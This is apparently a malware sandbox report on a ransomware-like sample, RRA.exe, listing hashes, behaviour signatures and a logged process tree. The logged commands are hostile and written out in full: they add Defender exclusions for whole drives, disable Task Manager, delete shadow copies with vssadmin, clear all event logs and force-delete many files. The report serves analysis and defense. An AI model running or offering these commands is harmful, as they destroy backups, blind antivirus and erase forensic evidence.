8a1a2c3f4e0f611c0066c53c9d2f65a8f453c911afab5421bcc9ff3b1a1958d9

Resubmissions

14-08-2021 07:36

210814-38vq5bhjlx 9

14-08-2021 02:11

210814-endwdrh1fx 9

Analysis

max time kernel
302s
max time network
308s
platform
windows10_x64
resource
win10v20210408
submitted
14-08-2021 07:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RRA.exe
Size

12.8MB
MD5

8cfd8faa312373f96567891afd0344ef
SHA1

3b232e440c87cbb6e1e8abe6d085954cd6e527fc
SHA256

8a1a2c3f4e0f611c0066c53c9d2f65a8f453c911afab5421bcc9ff3b1a1958d9
SHA512

9e58f9e2d4ce5e6076ff06c1179d613ddb75465ca5bfbeaaf9ff4c7f839675e3feaec85a59782fb71a560a33ec27db29ee1d153b16d0514803d15e218e334fee

Score

7^/10

Malware Config

Signatures

Loads dropped DLL 22 IoCs

Processes:

RRA.exe

pid	process
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe
1900	RRA.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2568 reg.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

RRA.exe

description pid process

Token: 35 1900 RRA.exe

pid	process
2568	reg.exe

description	pid	process
Token: 35	1900	RRA.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

RRA.exeRRA.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4796 wrote to memory of 1900	4796	RRA.exe	RRA.exe
PID 4796 wrote to memory of 1900	4796	RRA.exe	RRA.exe
PID 1900 wrote to memory of 412	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 412	1900	RRA.exe	cmd.exe
PID 412 wrote to memory of 800	412	cmd.exe	nslookup.exe
PID 412 wrote to memory of 800	412	cmd.exe	nslookup.exe
PID 1900 wrote to memory of 340	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 340	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 476	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 476	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1040	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1040	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1156	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1156	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1360	1900	RRA.exe	cmd.exe
PID 1900 wrote to memory of 1360	1900	RRA.exe	cmd.exe
PID 476 wrote to memory of 2220	476	cmd.exe	powershell.exe
PID 476 wrote to memory of 2220	476	cmd.exe	powershell.exe
PID 340 wrote to memory of 2372	340	cmd.exe	powershell.exe
PID 340 wrote to memory of 2372	340	cmd.exe	powershell.exe
PID 1156 wrote to memory of 2504	1156	cmd.exe	powershell.exe
PID 1156 wrote to memory of 2504	1156	cmd.exe	powershell.exe
PID 1360 wrote to memory of 2568	1360	cmd.exe	reg.exe
PID 1360 wrote to memory of 2568	1360	cmd.exe	reg.exe
PID 1040 wrote to memory of 2740	1040	cmd.exe	powershell.exe
PID 1040 wrote to memory of 2740	1040	cmd.exe	powershell.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
18268	attrib.exe
20248	attrib.exe
12284
21708
15532
12912	attrib.exe
5612	attrib.exe
10200
15800
13184
9520
13888	attrib.exe
13908
16184
16996
4548
13272
4532
10720
7556	attrib.exe
12988	attrib.exe
22424	attrib.exe
21412
20152
15668
13708
11896	attrib.exe
10724
19260
8764
16612
6668
21512
12996	attrib.exe
18648	attrib.exe
15356	attrib.exe
18060	attrib.exe
15576	attrib.exe
19008
6764	attrib.exe
5324
17632
20800
12996
14188
17576
5284	attrib.exe
10772	attrib.exe
7368
17032
19392
16800
18944	attrib.exe
15788	attrib.exe
17488	attrib.exe
12236	attrib.exe
16760
17752
14464	attrib.exe
11996
8840
16056
7496	attrib.exe
19764	attrib.exe

C:\Users\Admin\AppData\Local\Temp\RRA.exe
"C:\Users\Admin\AppData\Local\Temp\RRA.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Users\Admin\AppData\Local\Temp\RRA.exe
"C:\Users\Admin\AppData\Local\Temp\RRA.exe"
2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "nslookup myip.opendns.com resolver1.opendns.com"
3⤵
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
4⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionExtension exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -Force -ExclusionExtension exe
4⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionExtension py"
3⤵
- Suspicious use of WriteProcessMemory
PID:476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -Force -ExclusionExtension py
4⤵
PID:2220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionPath D:\"
3⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -Force -ExclusionPath D:\
4⤵
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionPath C:\"
3⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -Force -ExclusionPath C:\
4⤵
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
3⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
- Modifies registry key
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "vssadmin delete shadows /all /quiet"
3⤵
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1""
3⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll""
3⤵
PID:4524

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll"
4⤵
PID:5228

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\assembly\PublisherPolicy.tme"
4⤵
PID:8672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll""
3⤵
PID:648

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll"
4⤵
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\BCD.LOG1.rs""
3⤵
PID:208

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\BCD.LOG1.rs"
4⤵
PID:7784

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
5⤵
PID:12176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini""
3⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\BackupShow.jpe""
3⤵
PID:3732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\desktop.ini.rs""
3⤵
PID:1980

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\desktop.ini.rs"
4⤵
PID:5376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Program Files (x86)\desktop.ini""
3⤵
PID:736

C:\Windows\system32\attrib.exe
attrib -h "C:\Program Files (x86)\desktop.ini"
4⤵
PID:8896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\7-Zip\7-zip.chm""
3⤵
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\desktop.ini""
3⤵
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\Reader_DC.helpcfg""
3⤵
PID:3688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe""
3⤵
PID:2340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\addins\FXSEXT.ecf""
3⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp""
3⤵
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""
3⤵
PID:4632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Services\verisign.bmp""
3⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe""
3⤵
PID:4340

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\assembly\pubpol23.dat.rs"
4⤵
PID:5248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf""
3⤵
PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm""
3⤵
PID:2084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll""
3⤵
PID:804

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc"
4⤵
PID:11756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini""
3⤵
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc""
3⤵
PID:5276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkDiv.dll""
3⤵
PID:5516

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\bfsvc.exe"
4⤵
PID:12920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\Unistore\data\AggregateCache.uca""
3⤵
PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\IconCache.db""
3⤵
PID:7156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\IconCache.db.rs""
3⤵
PID:7148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Local\IconCache.db""
3⤵
PID:7048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\ApproveRedo.pot""
3⤵
PID:7040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Downloads\ApproveResize.mht""
3⤵
PID:7020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini""
3⤵
PID:6984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\adodb.dll""
3⤵
PID:7880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Oracle\Java\java.settings.cfg""
3⤵
PID:8376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll""
3⤵
PID:8904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\AutoLogger-Diagtrack-Listener.etl""
3⤵
PID:9372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.dll""
3⤵
PID:9356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig600.dll""
3⤵
PID:9348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\ActionsPane3.xsd""
3⤵
PID:8264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk1.8.0_66_x64\jdk1.8.0_66.msi""
3⤵
PID:5248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll""
3⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll""
3⤵
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\MF\Active.GRL""
3⤵
PID:4224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt""
3⤵
PID:7984

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Public\Pictures\desktop.ini"
4⤵
PID:7684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\AssertInitialize.wav""
3⤵
PID:7932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.stdformat.dll""
3⤵
PID:5564

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\hr-HR\bootmgr.exe.mui"
4⤵
PID:13592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""
3⤵
PID:9164

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\container.dat.rs"
4⤵
PID:16688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat""
3⤵
PID:9144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat.rs""
3⤵
PID:9136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat""
3⤵
PID:9124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll""
3⤵
PID:9112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll""
3⤵
PID:9100

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Public\desktop.ini"
4⤵
- Views/modifies file attributes
PID:18060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Oracle\Java\AU\au.msi""
3⤵
PID:9092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\IdentityCRL\INT\ppcrlconfig600.dll""
3⤵
PID:9080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD.LOG1""
3⤵
PID:9060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab""
3⤵
PID:9004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe""
3⤵
PID:8988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\List.txt""
3⤵
PID:8936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\BCD.LOG1""
3⤵
PID:8920

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\BCD.LOG1"
4⤵
PID:7476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab""
3⤵
PID:8868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\notificationsDB""
3⤵
PID:8836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat""
3⤵
PID:8344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store""
3⤵
PID:8320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\Cookies""
3⤵
PID:8280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""
3⤵
PID:8240

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
4⤵
PID:18532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\AddIns.store""
3⤵
PID:8232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\List.txt""
3⤵
PID:10120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\addins\FXSEXT.ecf""
3⤵
PID:10428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\A3DUtils.dll""
3⤵
PID:10280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll""
3⤵
PID:10268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget""
3⤵
PID:10260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\msdatasrc.dll""
3⤵
PID:10252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""
3⤵
PID:10244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab""
3⤵
PID:9332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\PipelineSegments.store""
3⤵
PID:5168

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml"
4⤵
PID:19408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll""
3⤵
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\PublisherPolicy.tme""
3⤵
PID:10192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab""
3⤵
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll""
3⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\deployment.properties""
3⤵
PID:6424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\addins\FXSEXT.ecf""
3⤵
PID:8884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT""
3⤵
PID:6532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\desktop.ini""
3⤵
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\PublisherPolicy.tme.rs""
3⤵
PID:9072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe""
3⤵
PID:6484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini""
3⤵
PID:6452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\mscomctl\10.0.4504.0__31bf3856ad364e35\MSCOMCTL.DLL""
3⤵
PID:6276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\desktop.ini""
3⤵
PID:364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.rs""
3⤵
PID:9632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""
3⤵
PID:9696

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui"
4⤵
PID:9656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll""
3⤵
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe""
3⤵
PID:9156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab""
3⤵
PID:9412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\assembly\PublisherPolicy.tme""
3⤵
PID:10184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
3⤵
PID:10112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\7-Zip\7-zip.dll""
3⤵
PID:10104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini""
3⤵
PID:10096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll""
3⤵
PID:10088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\extensibility.dll""
3⤵
PID:7832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
3⤵
PID:7816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\000003.log""
3⤵
PID:7768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""
3⤵
PID:7756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini.rs""
3⤵
PID:7744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""
3⤵
PID:7736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""
3⤵
PID:7604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
3⤵
PID:7692

